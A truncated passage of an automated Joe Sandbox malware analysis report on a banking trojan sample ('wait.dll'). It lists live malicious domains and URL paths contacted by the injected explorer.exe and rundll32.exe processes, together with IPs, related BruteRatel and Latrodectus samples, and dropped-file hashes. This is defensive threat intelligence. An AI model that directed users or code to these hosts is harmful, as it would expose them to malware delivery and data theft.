                                    https://dogirafer.com/explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://huanvn.com:6542/stop.phprundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://reateberam.com/test/wexplorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://huanvn.com:6542/gop.php5rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://vutarf.com/%rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://wns.windows.com/)sexplorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://dogirafer.com/Z#qexplorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://dogirafer.com/test/N#eexplorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://huanvn.com/~Crundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://reateberam.com/files/stkm.binoexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://r11.o.lencr.org0#rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://reateberam.com/qexplorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://huanvn.com:6542/gop.phprundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://dogirafer.com/3405117-2476756634-1003explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://huanvn.com:6542/gop.phpn)?rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://r10.o.lencr.org0#rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://reateberam.com/test/4560explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://vutarf.com:6542/stop.phprundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://dogirafer.com/test/ysexplorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://outlook.comexplorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4550686972.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3101269732.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://reateberam.com/files/stkm.binSLexplorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://r11.i.lencr.org/0rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2513069428.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536552097.000002339E1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://dogirafer.com/.5explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://r10.o.lencr.orundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://vutarf.com:6542/stop.phporundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dogirafer.com/test/Eexplorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://dogirafer.com/uoexplorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
https://vutarf.com/W | rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://vutarf.com:6542/stop.phpu | rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/ | explorer.exe, 00000008.00000002.4549635767.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://reateberam.com/p | explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://vutarf.com:6542/gop.php | rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://huanvn.com/P | rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.v | explorer.exe, 00000008.00000002.4535485561.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://huanvn.com/Q | rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dogirafer.com/eo | explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://r10.i.lencr.org/0 | rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.68.89 | dogirafer.com | United States | 13335 | CLOUDFLARENETUS | true
172.67.217.190 | reateberam.com | United States | 13335 | CLOUDFLARENETUS | true
103.57.249.207 | huanvn.com | India | 17747 | SITINETWORS-IN-APSITINETWORKSLIMITEDIN | true
94.232.43.224 | vutarf.com | Russian Federation | 44477 | WELLWEBNL | true
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1566852
                                                      Start date and time:2024-12-02 18:42:03 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 10m 22s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:45
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:wait.dll.dll
                                                      (renamed file extension from exe to dll)
                                                      Original Sample Name:wait.dll.exe
                                                      Detection:MAL
                                                      Classification:mal100.spre.bank.troj.spyw.evad.winDLL@70/7@7/4
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 59
                                                      • Number of non-executed functions: 192
                                                      Cookbook Comments:
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes were analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: wait.dll.dll
Time | Type | Description
12:42:59 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
12:43:55 | API Interceptor | 12219632x Sleep call for process: explorer.exe modified
12:45:18 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.68.89 | zdi.txt.msi | malicious | BruteRatel, Latrodectus |
172.67.217.190 | 4lXTg8P7Ih.elf | malicious | Mirai | /tmUnblock.cgi
103.57.249.207 | zdi.txt.msi | malicious | BruteRatel, Latrodectus |
94.232.43.224 | cTgZnuQlDo.exe | malicious | SystemBC |
94.232.43.224 | cTgZnuQlDo.exe | malicious | SystemBC |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
huanvn.com | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 103.57.249.207
reateberam.com | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 104.21.16.251
bg.microsoft.map.fastly.net | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 199.232.210.172
bg.microsoft.map.fastly.net | Wc pay benefit.pdf | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | file.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | Nymaim | 199.232.210.172
bg.microsoft.map.fastly.net | file.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | RFQ-2309540_27112024.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 199.232.210.172
bg.microsoft.map.fastly.net | faktura461250706050720242711#U00b7pdf.vbs | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 11315781264#U00b7pdf.vbs | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 30180908_signed#U00b7pdf.vbs | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | file.exe | malicious | Unknown | 199.232.214.172
dogirafer.com | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 104.21.68.89
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 104.21.68.89
CLOUDFLARENETUS | https://www.paypal.com/myaccount/transaction/details/7PH333382L561513K?v=1&utm_source=unp&utm_medium=email&utm_campaign=RT000298&utm_unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&ppid=RT000298&cnac=US&rsta=en_US%28en-US%29&unptid=4b412a33-b0d1-11ef-a147-1da0668aaf9b&calc=0052231041435&unp_tpcid=email-standard-transaction-unilateral&page=main%3Aemail%3ART000298&pgrp=main%3Aemail&e=cl&mchn=em&s=ci&mail=sys&appVersion=1.294.0&xt=145585%2C150948%2C104038 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | Wc pay benefit.pdf | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | http://mailgun.internationalsos.com/c/eJxUzcGO2yoYxfGngR0RYIxhwcKO4d5ITRuNpyN1ieFLhtYGy7it5u2rLGd5jvTX77_rdIVa_QMuo-GKMqnahuEpHRDKDpcD1stoUDe0cuDtKAbCGtsRofuBaMktGRRzfSdGRgVD3fip_OLz47d_gIH86X-DvaaSDcPTR30K0UgcjQAW7hgM6xqupNSa4nej52YOSrVRNJ7OAhRwJmcRwj3ArEKHkxnP0tmzUoRa3hHBdEsGJzviBqbcMGrba4cE_T5ZNv3f36br622iDV7M-3FsFTU94g5xF2Jmp5QP2LM_Usl-qaWeQlkRdwRx97PWFWLyiLvN5whrCog7lxaoiLvocyQb2SK5P2fKx0JqqWQrSypk9R-EUy5OW7wjy5GiSJ_xbl6-_Ti92Zfptb_d7Fck6F7Cr7-lLE8X_zH8XwAAAP__jX59nw | malicious | Unknown | 104.18.86.42
CLOUDFLARENETUS | https://pa.compassionatetraveler.org/kqawsedrftgyhugtfrdesedrftgyhujwsedrfgtyhhygtfrderftghyujikiujhygtfrtgyhujjuhygtfrtgyhuji%20 | malicious | Unknown | 172.66.40.234
CLOUDFLARENETUS | http://ar-oracle.com | malicious | Unknown | 104.18.161.117
CLOUDFLARENETUS | Employee_Important_Message.pdf | malicious | Unknown | 104.26.13.205
CLOUDFLARENETUS | ATT4802.html | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | Flumroc.docx | malicious | Unknown | 104.17.25.14
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 103.57.249.207
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | loligang.mips.elf | malicious | Mirai | 202.142.118.100
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | na.elf | malicious | Gafgyt | 103.225.178.92
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | msas.msi | malicious | ORPCBackdoor | 103.57.249.42
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | msas.msi | malicious | ORPCBackdoor | 103.57.249.42
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | sstn.exe | malicious | Unknown | 103.57.250.204
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | sstn.exe | malicious | Unknown | 103.57.250.204
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | VKkfiTAZXP.elf | malicious | Gafgyt, Mirai | 103.225.178.98
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | YnO77q8WhV.elf | malicious | Unknown | 45.117.200.73
SITINETWORS-IN-APSITINETWORKSLIMITEDIN | 3A8YbQ0RZ7.dll | malicious | Qbot | 202.142.98.62
WELLWEBNL | sqx.dll.dll | malicious | Unknown | 94.232.40.38
WELLWEBNL | merd.msi | malicious | Unknown | 94.232.40.38
WELLWEBNL | sqx.dll.dll | malicious | Unknown | 94.232.40.38
WELLWEBNL | mesh.exe | malicious | MeshAgent | 94.232.43.185
WELLWEBNL | mesh.exe | malicious | MeshAgent | 94.232.43.185
WELLWEBNL | Document-19-06-38.js | malicious | BruteRatel | 94.232.43.213
WELLWEBNL | 81zBpBAWwc.exe | malicious | RHADAMANTHYS | 94.232.45.36
WELLWEBNL | JeZHGKJvrB.exe | malicious | Unknown | 94.232.44.144
WELLWEBNL | hFoVk4DJXG.exe | malicious | Unknown | 94.232.44.144
WELLWEBNL | JbZaDxFXF3.exe | malicious | NetSupport RAT | 94.232.42.28
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | zdi.txt.msi | malicious | BruteRatel, Latrodectus | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | Full_Setup_v24.exe | malicious | LummaC Stealer | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | Swiftcopy.xla.xlsx | malicious | Unknown | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | New Order.xls | malicious | Unknown | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.68.89, 172.67.217.190
a0e9f5d64349fb13191bc781f81f42e1 | REMITTANCE COPY FOR INVOICE PAYMENT.exe | malicious | DBatLoader | 104.21.68.89, 172.67.217.190
                                                              No context
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.017262956703125623
                                                              Encrypted:false
                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                              Malicious:false
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
